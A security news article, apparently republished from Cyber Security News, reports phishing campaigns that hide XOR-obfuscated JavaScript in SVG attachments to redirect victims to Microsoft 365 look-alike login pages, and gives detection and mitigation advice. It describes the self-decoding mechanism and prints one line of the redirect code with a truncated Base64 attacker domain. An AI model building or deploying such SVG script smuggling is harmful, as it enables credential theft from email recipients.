serisec

Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript

Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript










Threat actors are quietly turning Scalable Vector Graphics (SVG) files into precision-guided malware. In a surge of phishing campaigns, seemingly innocuous .svg attachments slip past secure email gateways because mail filters regard them as static images.

Once the recipient merely previews the file, hidden JavaScript executes inside the browser, triggering an invisible redirect chain that funnels victims to attacker infrastructure.

The Recipient’s perspective (Source – Ontinue)

The lure emails are minimalist—often a single icon or “Missed Call” teaser—and exploit organisations that have weak SPF, DKIM or DMARC enforcement.

As the attachments bypass signature checks, the first line of defence fails; Ontinue analysts identified the wave after correlating near-identical SVGs sent to B2B service providers and SaaS vendors, all containing distinct Base64 tracking strings that map each click to a workstation.

Since no executable is dropped, endpoint agents see only normal browser activity while credentials are siphoned off on well-crafted Microsoft 365 look-alike portals.

Typical M365 Credential Phishing (Source – Ontinue)

Beyond credential theft, the technique exemplifies a broader strategic pivot: adversaries increasingly weaponise file formats that browsers render natively, removing the social-engineering friction of persuading users to run macros or installers.

Security controls that focus on executables, archives or scripts alone find themselves blind to these pixel-perfect stings.

Infection Mechanism: Self-Decoding JavaScript Smuggling

Each malicious SVG embeds an obfuscated payload between “ tags. A ten-byte XOR key masks the script, frustrating static scanners, while a two-stage routine reconstructs the redirect at runtime.

First, a short function iterates through the encrypted blob, returning plaintext; then it leverages the Function constructor to execute that code entirely in memory.

The revived script concatenates an atob()-decoded domain with a victim-specific token before forcing navigation:-

window.location.href = atob(
  'aHR0cHM6Ly93dnJ6LmxmdGt2b2cubmV0L...' // domain rotates daily
) + token;

As nothing is written to disk, persistence is irrelevant, and geofencing logic ensures sandboxes outside the target region receive benign pages.

Detecting the threat therefore hinges on deep content inspection that flags script tags inside image files or on correlating unusual .svg command-line invocations with email telemetry.

Until such controls mature, organisations should quarantine unsolicited SVGs, enable content disarm and reconstruction, and move DMARC policies from monitoring to reject.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now

The post Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript appeared first on Cyber Security News.






Tushar Subhra Dutta





Go to cyber-security-news




Posted

in

, ,

by

leeanne

Tags: